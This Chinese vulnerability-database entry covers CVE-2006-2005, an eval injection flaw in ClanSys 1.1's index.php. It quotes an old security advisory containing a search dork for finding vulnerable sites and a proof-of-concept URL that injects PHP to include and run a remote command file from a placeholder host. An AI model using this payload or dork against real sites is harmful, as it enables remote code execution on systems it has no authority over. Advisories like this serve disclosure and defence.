ClanSys index.php Eval注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110125 漏洞类型 输入验证
发布时间 2006-04-23 更新时间 2006-05-10
CVE编号 CVE-2006-2005 CNNVD-ID CNNVD-200604-469
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1710
https://cxsecurity.com/issue/WLB-2006040103
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-469
|漏洞详情
ClanSys1.1中的index.php存在Eval注入漏洞。这使得远程攻击者可以借助于page参数中的PHP代码执行任意PHP代码,如使用"include"语句,该语句被注入到eval语句中。注意:此问题被描述为由源文件造成的文件包含,但其只是一次攻击;主要漏洞是eval注入。
|漏洞EXP
NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?

# nukedx.com [2006-04-23]

# milw0rm.com [2006-04-23]
|参考资料

来源:BID
名称:17660
链接:http://www.securityfocus.com/bid/17660
来源:BUGTRAQ
名称:20060423Advisory:Clansys<=1.1PHPCodeInsertionVulnerability.
链接:http://www.securityfocus.com/archive/1/archive/1/431873/100/0/threaded
来源:MISC
链接:http://www.nukedx.com/?getxpl=29
来源:SECTRACK
名称:1015988
链接:http://securitytracker.com/id?1015988
来源:XF
名称:clansys-index-file-include(25976)
链接:http://xforce.iss.net/xforce/xfdb/25976
来源:OSVDB
名称:25083
链接:http://www.osvdb.org/25083
来源:SREASON
名称:782
链接:http://securityreason.com/securityalert/782